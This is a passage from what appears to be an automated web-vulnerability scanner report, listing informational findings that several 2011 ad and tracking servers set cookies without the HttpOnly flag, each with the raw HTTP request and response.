JaRLJM8dnU1Nhl4Gj4DbtR0q02VwtV6eFe3CztMFbpkbIC8QRi-0-t0Q0lWju26SjBcFQ0SU-Q9PM_H4NT6AI8v_boZ3SdVlbIcVdR0yZ4wedowaV7UdLSZT7Vd3BZ1KiY9UBdA5uI2cB84BCr7aSv_WzT6Y4rLfuC2S9rqcVQFVrB7RXcS8ct0eawHscfZtg6DjU2kd4mzjdZAZ1N-YY92z2OVeSZ2FL5fR9kiNgijvfD-uQGvZt18MNEuRd6-og7BHQ4MLjuFAxUjCRGcr4Wz1bF_gp-HqZlvshuxvLJX9Q1uaghvWvoDX2h3Tna6Tq_5FNrC8eFEaOBiixj5GMpqN1mMqzZCd2dYo2uIBroHY1sBGoqGendnWKNriAa6B2NbARqKhnsm1CmKqgKyOK13X-vu4sXaZhAZ7dALNrlk2ZHupjzbZY4Skgdl7-1xlrgatqP0BPkDy2gYn1fKV06W2G3H81OxfZr29Puen9VV4NGp4BUq5TwT_el8ARa0B5bXFDez7TjQPThcXUuLZr2wajJbtGXgfM7CBtk-9mAyKLE0-tkghfsQnFe8RDolHxo4SRL9-K1XKoo8vmE9KuX6fSQjzEzjIjx8ScH5O8C3okRouLhhDy36dawlh2vAyUu-Jy2pQNQ; fc=ZUZU62WSV7nfkj5OuUXlEuTbw71SxSIM1JZ50RraV4iJlDq2d88xQrqQkmk8VI-DV4N7x_k-SjlCpIAKcw_aSFfb3vCZSK3GVbftks7IMxvi3Sy-PEwXW67DoFr3mtCG

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3698952182471149434; Domain=.turn.com; Expires=Sun, 15-Jan-2012 20:43:05 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:43:04 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3698952182471149434&rnd=3988428324264951213&fpid=4&nu=n&t=
...[SNIP]...

14.103. http://r1-ads.ace.advertising.com/site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue HTTP/1.1
Host: r1-ads.ace.advertising.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: ACID=gz150013044372470058; C2=9ZIJOJpwHg02Ft1BdbdRbdAmoZ0WH4fvGtFt9YA8raYrC2tBi2Uh8HbPGsOlG6PnFdw7LYQRwu/BYOpRFJ6LI4NLG/G; GUID=MTMxMDY4NDI1ODsxOjE3MGliaG4wMWNtbnEyOjM2NQ; F1=Bwthk4EBAAAABAAAAYAAeEA; BASE=RagevvmNI50lwaYGzAjLGety9H7tx6n0GOPCcMMxVO/SJzIGr4njcOMwvmlYrsF!; ROLL=2TgM2QnlNOiYjDjHBUUu5Ru+iJy9peWSGwNHI9wCApF9yfwBPXWGZfL!; aceRTB=rm%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7Cam%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7Cdc%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7Can%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7Crub%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7C; A07L=39VpRQiFM7Ejog5CPRr6l003MZh1efyTZJsx0cnm7dLyA8oEYfYNzwQ

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1040486.808880.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 19 Jul 2011 20:44:31 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 615
Date: Tue, 19 Jul 2011 20:44:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=vyeJOJpwHg02F8wBdbdBPcAmoZwDH4fvG8At9YA8raUYC2tBi2URwGbPGsOlGJLnFZw7LYM+wuvBYOpB5L6LI4NLGOCqyBwHcZAS; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
Set-Cookie: F1=B8K7l4EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
Set-Cookie: BASE=RagegvmNI50lwaYGzAjLGety9H7tx6n0GOPCcMMxVO/SJzIGr4njcOMwvmlYrsFznFYf9CM!; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
Set-Cookie: ROLL=2TgMxQnPNOiYeID!; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
Set-Cookie: 14768994=_4e25ecaf,8285755238,808880^1040486^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B5645623.4;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0
...[SNIP]...

14.104. http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realnetworksrealarca.tt.omtrdc.net
Path:   /m2/realnetworksrealarca/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/realnetworksrealarca/mbox/standard?mboxHost=support.gamehouse.com&mboxSession=1311107151665-897688&mboxPage=1311107151665-897688&screenHeight=1200&screenWidth=1920&browserWidth=1065&browserHeight=723&browserTimeOffset=-300&colorDepth=32&mboxXDomain=x-only&mboxCount=1&mbox=gh-global&mboxId=0&mboxTime=1311089154536&mboxURL=http%3A%2F%2Fsupport.gamehouse.com%2F&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: realnetworksrealarca.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1311107151665-897688.17; Domain=realnetworksrealarca.tt.omtrdc.net; Expires=Tue, 02-Aug-2011 20:25:48 GMT; Path=/m2/realnetworksrealarca
Content-Type: text/javascript
Content-Length: 1402
Date: Tue, 19 Jul 2011 20:25:48 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('gh-global',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default-gh-glo
...[SNIP]...

14.105. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1113671950/SPONSOR/boston/default/empty.gif/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1113671950/SPONSOR/boston/default/empty.gif/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1113671950/SPONSOR/boston/default/empty.gif/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.106. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.107. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/346633134/BILLBOARD/boston/default/empty.gif/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/346633134/BILLBOARD/boston/default/empty.gif/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/346633134/BILLBOARD/boston/default/empty.gif/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.108. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1268261386/LOGO1/boston/bw_house_HIGHLIGHT/651651421411002.html/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1268261386/LOGO1/boston/bw_house_HIGHLIGHT/651651421411002.html/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1268261386/LOGO1/boston/bw_house_HIGHLIGHT/651651421411002.html/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:02 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8A; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.109. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1370466985/HEADLINE2/boston/m_livenat061311_bchm_HEADLINE2/0615_SummerComcast_234.jpg/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1370466985/HEADLINE2/boston/m_livenat061311_bchm_HEADLINE2/0615_SummerComcast_234.jpg/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1370466985/HEADLINE2/boston/m_livenat061311_bchm_HEADLINE2/0615_SummerComcast_234.jpg/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.110. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1374996851/CENTRAL/boston/m_fallon070611_bchm_BIGAD/300x250_bchm_070611-fallon.html/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1374996851/CENTRAL/boston/m_fallon070611_bchm_BIGAD/300x250_bchm_070611-fallon.html/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1374996851/CENTRAL/boston/m_fallon070611_bchm_BIGAD/300x250_bchm_070611-fallon.html/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:02 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8A; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.111. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/142449885/LOGO5/boston/m_dunkin020111_bchm_SPONSOR/dunkin_yt_logo100x40.jpg/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/142449885/LOGO5/boston/m_dunkin020111_bchm_SPONSOR/dunkin_yt_logo100x40.jpg/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/142449885/LOGO5/boston/m_dunkin020111_bchm_SPONSOR/dunkin_yt_logo100x40.jpg/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.112. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1489951529/HEADLINE1/boston/t_mspca071911_bchm_HEADLINE/234x60_bchm_071911-mspca.html/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1489951529/HEADLINE1/boston/t_mspca071911_bchm_HEADLINE/234x60_bchm_071911-mspca.html/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1489951529/HEADLINE1/boston/t_mspca071911_bchm_HEADLINE/234x60_bchm_071911-mspca.html/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.113. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1687713133/TILE1/boston/g_globeshoplocal051311_bchm_TILE/shoplocal040510_bchm_TILE.html/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1687713133/TILE1/boston/g_globeshoplocal051311_bchm_TILE/shoplocal040510_bchm_TILE.html/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1687713133/TILE1/boston/g_globeshoplocal051311_bchm_TILE/shoplocal040510_bchm_TILE.html/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:11 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8J; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.114. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonialniss071911_clst_LEADER/colonial_nissan_071511_lb.jpg/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonialniss071911_clst_LEADER/colonial_nissan_071511_lb.jpg/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonialniss071911_clst_LEADER/colonial_nissan_071511_lb.jpg/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:02 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8A; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.115. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/407535735/LOGO9/boston/c_herbcham0311_bchm_LOGO/hc_toyota_062411_video_sponsor_ad.jpg/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
